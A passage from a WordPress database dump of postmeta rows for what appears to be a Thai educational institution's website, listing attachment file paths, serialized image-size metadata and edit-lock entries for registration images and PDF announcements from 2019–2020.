:\"university-hub-thumb\";a:4:{s:4:\"file\";s:166:\"วิธีการมอบตัว-ลงทะเบียนเรียนเป็นนักเรียน-นักศึกษาใหม่-400x80.png\";s:5:\"width\";i:400;s:6:\"height\";i:80;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(19064, 9182, '_wp_attached_file', '2019/12/ปุ่มโหลด-2563-1-01.png'),
(19065, 9182, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2084;s:6:\"height\";i:592;s:4:\"file\";s:46:\"2019/12/ปุ่มโหลด-2563-1-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:46:\"ปุ่มโหลด-2563-1-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"ปุ่มโหลด-2563-1-01-300x85.png\";s:5:\"width\";i:300;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:46:\"ปุ่มโหลด-2563-1-01-768x218.png\";s:5:\"width\";i:768;s:6:\"height\";i:218;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:47:\"ปุ่มโหลด-2563-1-01-1024x291.png\";s:5:\"width\";i:1024;s:6:\"height\";i:291;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:46:\"ปุ่มโหลด-2563-1-01-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(19066, 9183, '_wp_attached_file', '2019/12/ปุ่มโหลด-2563-2-01.png'),
(19067, 9183, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2084;s:6:\"height\";i:592;s:4:\"file\";s:46:\"2019/12/ปุ่มโหลด-2563-2-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:46:\"ปุ่มโหลด-2563-2-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"ปุ่มโหลด-2563-2-01-300x85.png\";s:5:\"width\";i:300;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:46:\"ปุ่มโหลด-2563-2-01-768x218.png\";s:5:\"width\";i:768;s:6:\"height\";i:218;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:47:\"ปุ่มโหลด-2563-2-01-1024x291.png\";s:5:\"width\";i:1024;s:6:\"height\";i:291;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:46:\"ปุ่มโหลด-2563-2-01-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(19296, 9402, '_edit_lock', '1584500500:14'),
(19297, 9402, '_edit_last', '14'),
(19298, 9403, '_wp_attached_file', '2020/03/20200318095947390.pdf'),
(19301, 9402, '_hide_featured', NULL),
(19590, 9598, '_edit_lock', '1584587214:14'),
(19591, 9598, '_edit_last', '14'),
(19592, 9599, '_wp_attached_file', '2020/03/20200319092239181.pdf'),
(19595, 9598, '_hide_featured', NULL),
(19600, 9601, '_edit_lock', '1584587520:14'),
(19601, 9601, '_edit_last', '14'),
(19602, 9602, '_wp_attached_file', '2020/03/20200319092355429.pdf'),
(19605, 9601, '_hide_featured', NULL),
(19608, 9604, '_edit_lock', '1584607414:14'),
(19609, 9604, '_edit_last', '14'),
(19610, 9605, '_wp_attached_file', '2020/03/20200319114910981.pdf'),
(19613, 9604, '_hide_featured', NULL),
(19623, 9609, '_wp_attached_file', '2019/12/กำหนดรับรบ.1.jpg'),
(19624, 9609, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2338;s:6:\"height\";i:1654;s:4:\"file\";s:44:\"2019/12/กำหนดรับรบ.1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"กำหนดรับรบ.1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"กำหนดรับรบ.1-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:44:\"กำหนดรับรบ.1-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:45:\"กำหนดรับรบ.1-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:44:\"กำหนดรับรบ.1-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(19625, 9610, '_wp_attached_file', '2019/12/190463-01.png'),
(19626, 9610, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:900;s:4:\"file\";s:21:\"2019/12/190463-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"190463-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"190463-01-300x180.png\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"190463-01-768x461.png\";s:5:\"width\";i:768;s:6:\"height\";i:461;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"190463-01-1024x614.png\";s:5:\"width\";i:1024;s:6:\"height\";i:614;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"190463-01-400x240.png\";s:5:\"width\";i:400;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(19868, 9774, '_edit_lock', '1584675248:14'),
(19869, 9774, '_edit_last', '14'),
(19870, 9775, '_wp_attached_file', '2020/03/20200320110031141.pdf'),
(19873, 9774, '_hide_featured', NULL),
(19876, 9777, '_edit_lock', '1584675699:14'),
(19877, 9777, '_edit_last', '14'),
(19878, 9778, '_wp_attached_file', '2020/03/20200320110151299.pdf'),
(19881, 9777, '_hide_featured', NULL),
(19884, 9780, '_edit_lock', '1584675893:14'),
(19885, 9780, '_edit_last', '14'),
(19886, 9781, '_wp_attached_file', '2020/03/20200320110411702.pdf'),
(19889, 9780, '_hide_featured', NULL),
(19892, 9783, '_edit_lock', '1584676160:14'),
(19893, 9783, '_edit_last', '14'),
(19894, 9784, '_edit_lock', '1585040976:14'),
(19895, 9785, '_wp_attached_file', '2020/03/20200320105914206.pdf'),
(19896, 9784, '_edit_last', '14'),
(19899, 9784, '_hide_featured', NULL),
(19950, 6417, '_edit_lock', '1584941456:1'),
(19951, 9826, '_wp_attached_file', '2019/12/register-plus-01.png'),
(19952, 9826, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:630;s:4:\"file\";s:28:\"2019/12/register-plus-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"register-plus-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"register-plus-01-300x76.png\";s:5:\"width\";i:300;s:6:\"height\";i:76;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"register-plus-01-768x195.png\";s:5:\"width\";i:768;s:6:\"height\";i:195;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"register-plus-01-1024x260.png\";s:5:\"width\";i:1024;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:28:\"register-plus-01-400x102.png\";s:5:\"width\";i:400;s:6:\"height\";i:102;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(19953, 9827, '_wp_attached_file', '2019/12/register-plus-01.jpg'),
(19954, 9827, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:630;s:4:\"file\";s:28:\"2019/12/register-plus-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"register-plus-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"register-plus-01-300x76.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:76;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"register-plus-01-768x195.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:195;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"register-plus-01-1024x260.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:28:\"register-plus-01-400x102.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(19955, 9829, '_wp_attached_file', '2019/12/pay-money-01.jpg'),
(19956, 9829, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:630;s:4:\"file\";s:24:\"2019/12/pay-money-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"pay-money-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"pay-money-01-300x76.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:76;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"pay-money-01-768x195.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:195;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"pay-money-01-1024x260.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"pay-money-01-400x102.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(20139, 9962, '_wp_attached_file', '2019/12/register-more-2-01.jpg'),
(20140, 9962, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2481;s:6:\"height\";i:530;s:4:\"file\";s:30:\"2019/12/register-more-2-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"register-more-2-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"register-more-2-01-300x64.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:64;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"register-more-2-01-768x164.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:164;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"register-more-2-01-1024x219.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:219;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"register-more-2-01-400x85.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24678, 9967, '_edit_lock', '1585040911:14'),
(24679, 9967, '_edit_last', '14'),
(24680, 9968, '_wp_attached_file', '2020/03/240463-03.jpg'),
(24681, 9968, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:724;s:6:\"height\";i:1014;s:4:\"file\";s:21:\"2020/03/240463-03.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"240463-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"240463-03-214x300.jpg\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"240463-03-214x300.jpg\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1585065761\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24682, 9969, '_wp_attached_file', '2020/03/240463-02.jpg'),
(24683, 9969, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:735;s:6:\"height\";i:1129;s:4:\"file\";s:21:\"2020/03/240463-02.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"240463-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"240463-02-195x300.jpg\";s:5:\"width\";i:195;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"240463-02-667x1024.jpg\";s:5:\"width\";i:667;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"240463-02-195x300.jpg\";s:5:\"width\";i:195;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1585065761\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24684, 9970, '_wp_attached_file', '2020/03/240463-01.jpg'),
(24685, 9970, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:766;s:6:\"height\";i:1093;s:4:\"file\";s:21:\"2020/03/240463-01.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"240463-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"240463-01-210x300.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"240463-01-718x1024.jpg\";s:5:\"width\";i:718;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"240463-01-210x300.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1585065761\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24686, 9971, '_wp_attached_file', '2020/03/240463-04.jpg'),
(24687, 9971, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:969;s:6:\"height\";i:644;s:4:\"file\";s:21:\"2020/03/240463-04.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"240463-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"240463-04-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"240463-04-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"240463-04-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1585065761\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24690, 9967, '_hide_featured', NULL),
(24696, 9974, '_edit_lock', '1585042634:14'),
(24697, 9974, '_edit_last', '14'),
(24698, 9975, '_wp_attached_file', '2020/03/20200324153737079.pdf'),
(24701, 9974, '_hide_featured', NULL),
(24704, 9977, '_edit_lock', '1585125753:14'),
(24705, 9977, '_edit_last', '14'),
(24706, 9978, '_wp_attached_file', '2020/03/20200325161934505.pdf'),
(24707, 9979, '_wp_attached_file', '2020/03/20200325161934505-1.pdf'),
(24710, 9977, '_hide_featured', NULL),
(24713, 9981, '_edit_lock', '1585274975:14'),
(24714, 9981, '_edit_last', '14'),
(24715, 9982, '_wp_attached_file', '2020/03/27036301.pdf'),
(24718, 9981, '_hide_featured', NULL),
(24723, 9984, '_edit_lock', '1585297600:14'),
(24724, 9984, '_edit_last', '14'),
(24725, 9985, '_wp_attached_file', '2020/03/27036302.pdf'),
(24728, 9984, '_hide_featured', NULL),
(24731, 9987, '_edit_lock', '1585298518:14'),
(24732, 9987, '_edit_last', '14'),
(24733, 9988, '_wp_attached_file', '2020/03/27036303.pdf'),
(24736, 9987, '_hide_featured', NULL),
(24739, 9990, '_edit_lock', '1590125400:14'),
(24740, 9990, '_edit_last', '14'),
(24741, 9991, '_wp_attached_file', '2020/03/27036304.pdf'),
(24744, 9990, '_hide_featured', NULL),
(24747, 9993, '_edit_lock', '1585620197:14'),
(24748, 9993, '_edit_last', '14'),
(24749, 9994, '_wp_attached_file', '2020/03/27036305.pdf'),
(24752, 9993, '_hide_featured', NULL),
(24753, 9996, '_edit_lock', '1585546870:14'),
(24754, 9996, '_edit_last', '14'),
(24755, 9997, '_wp_attached_file', '2020/03/30036301.pdf'),
(24758, 9996, '_hide_featured', NULL),
(24763, 9999, '_wp_attached_file', '2019/12/S__170590210.jpg'),
(24764, 9999, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1149;s:6:\"height\";i:774;s:4:\"file\";s:24:\"2019/12/S__170590210.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"S__170590210-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"S__170590210-300x202.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"S__170590210-768x517.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:517;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"S__170590210-1024x690.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:690;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"S__170590210-400x269.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24765, 10004, '_edit_lock', '1585623627:14'),
(24766, 10004, '_edit_last', '14'),
(24767, 10005, '_wp_attached_file', '2020/03/31036301.pdf'),
(24770, 10004, '_hide_featured', NULL),
(24775, 10009, '_edit_lock', '1585817102:14'),
(24776, 10009, '_edit_last', '14'),
(24779, 10011, '_wp_attached_file', '2020/03/20760_20200331115610312.pdf'),
(24786, 10015, '_wp_attached_file', '2020/03/01046301.pdf'),
(24789, 10009, '_hide_featured', NULL),
(24790, 10009, '_wp_old_date', '2020-03-31'),
(24791, 10017, '_edit_lock', '1585817201:14'),
(24792, 10017, '_edit_last', '14'),
(24793, 10018, '_wp_attached_file', '2020/04/ประกาศพ้นสภาพเกรดไม่ถึงเกณฑ์2-62.pdf'),
(24796, 10017, '_hide_featured', NULL),
(24799, 10023, '_edit_lock', '1585905146:14'),
(24800, 10023, '_edit_last', '14'),
(24801, 10024, '_wp_attached_file', '2020/04/20200403145539011.pdf'),
(24804, 10023, '_hide_featured', NULL),
(24805, 10027, '_edit_lock', '1586323202:14'),
(24806, 10027, '_edit_last', '14'),
(24807, 10028, '_wp_attached_file', '2020/04/20200407154058902.pdf'),
(24810, 10027, '_hide_featured', NULL),
(24811, 10030, '_edit_lock', '1586405720:14'),
(24812, 10030, '_edit_last', '14'),
(24813, 10031, '_wp_attached_file', '2020/04/20200408153817609.pdf'),
(24816, 10030, '_hide_featured', NULL),
(24820, 10039, '_edit_lock', '1587401251:14'),
(24821, 10040, '_wp_attached_file', '2020/04/5.jpg'),
(24822, 10040, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:13:\"2020/04/5.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"5-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"5-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24823, 10041, '_wp_attached_file', '2020/04/6.jpg'),
